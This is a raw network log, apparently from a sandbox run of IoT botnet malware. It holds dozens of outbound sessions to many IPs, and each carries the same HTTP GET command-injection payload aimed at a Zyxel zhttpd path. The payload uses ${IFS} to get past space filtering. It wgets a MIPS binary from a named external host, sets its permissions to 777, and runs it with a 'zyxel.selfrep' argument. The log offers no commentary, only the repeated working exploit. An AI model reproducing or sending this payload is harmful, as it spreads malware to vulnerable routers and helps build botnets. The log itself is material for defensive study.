                                            Jan 14, 2024 15:50:32.292376041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2316192.168.2.23600644.77.53.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292412996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2317192.168.2.235099289.233.216.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292438030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2318192.168.2.2335364216.63.21.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292493105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2319192.168.2.2352100108.93.0.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292501926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2320192.168.2.2335282191.39.69.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292522907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2321192.168.2.2357188205.252.186.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292560101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2322192.168.2.2354562154.244.30.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292598963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2323192.168.2.2350180122.188.165.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292637110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2324192.168.2.2349826152.215.153.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292665005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2325192.168.2.2358660194.20.192.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292700052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2326192.168.2.234207297.244.46.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292721987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2327192.168.2.2349360145.141.213.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292757988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2328192.168.2.2333840157.142.230.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292762995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2329192.168.2.2354152137.9.57.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292784929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2330192.168.2.234316870.239.117.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292804003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2331192.168.2.234858625.58.164.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292839050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2332192.168.2.233687431.145.97.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292859077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2333192.168.2.2358670206.119.0.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292900085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2334192.168.2.2349234174.108.32.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292922974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2335192.168.2.2352742201.165.166.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292927027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2336192.168.2.2356746159.232.137.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292989016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2337192.168.2.2353096219.122.178.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.292992115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2338192.168.2.234827817.164.77.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293004036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2339192.168.2.234434272.140.113.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293015957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2340192.168.2.2350796209.213.209.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293049097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2341192.168.2.2356172178.227.166.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293075085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2342192.168.2.2346750123.150.180.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293133020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2343192.168.2.233793266.252.20.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293179989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2344192.168.2.2357546133.35.244.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293206930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2345192.168.2.2341468142.41.249.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293236017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2346192.168.2.2342966118.200.44.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293275118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2347192.168.2.234848875.72.135.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293297052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2348192.168.2.234090099.21.11.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293297052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2349192.168.2.233318479.136.237.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293328047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2350192.168.2.233956489.61.117.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293332100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2351192.168.2.2333934121.97.25.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293385029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2352192.168.2.2345212120.135.137.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293430090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2353192.168.2.2342328155.247.170.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293454885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2354192.168.2.235347441.112.135.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293483973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2355192.168.2.234306240.141.59.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293507099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2356192.168.2.2340558162.42.96.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293546915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2357192.168.2.235924834.28.57.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293553114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2358192.168.2.234427890.213.53.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293597937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2359192.168.2.2357186122.194.170.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293642998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2360192.168.2.2347506184.170.150.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293664932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2361192.168.2.2334038195.167.234.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293710947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2362192.168.2.234191275.84.171.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293732882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2363192.168.2.2353040125.178.54.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293757915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2364192.168.2.234494495.237.135.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293808937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2365192.168.2.235805418.16.226.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293836117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2366192.168.2.2349286207.155.121.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293891907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2367192.168.2.2336602157.252.97.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293914080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2368192.168.2.233756880.252.76.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293934107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2369192.168.2.2346726202.158.103.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293961048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2370192.168.2.2345162181.170.134.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293987989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2371192.168.2.234761048.23.111.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.293987989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2372192.168.2.2348560219.78.0.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294006109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2373192.168.2.2347236190.32.134.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294040918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2374192.168.2.2357894207.66.79.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294071913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2375192.168.2.235839891.109.187.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294090033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2376192.168.2.235535851.135.70.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294128895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2377192.168.2.234151245.251.25.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:32.294161081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2378192.168.2.2337132111.97.107.178443
                                            TimestampBytes transferredDirectionData
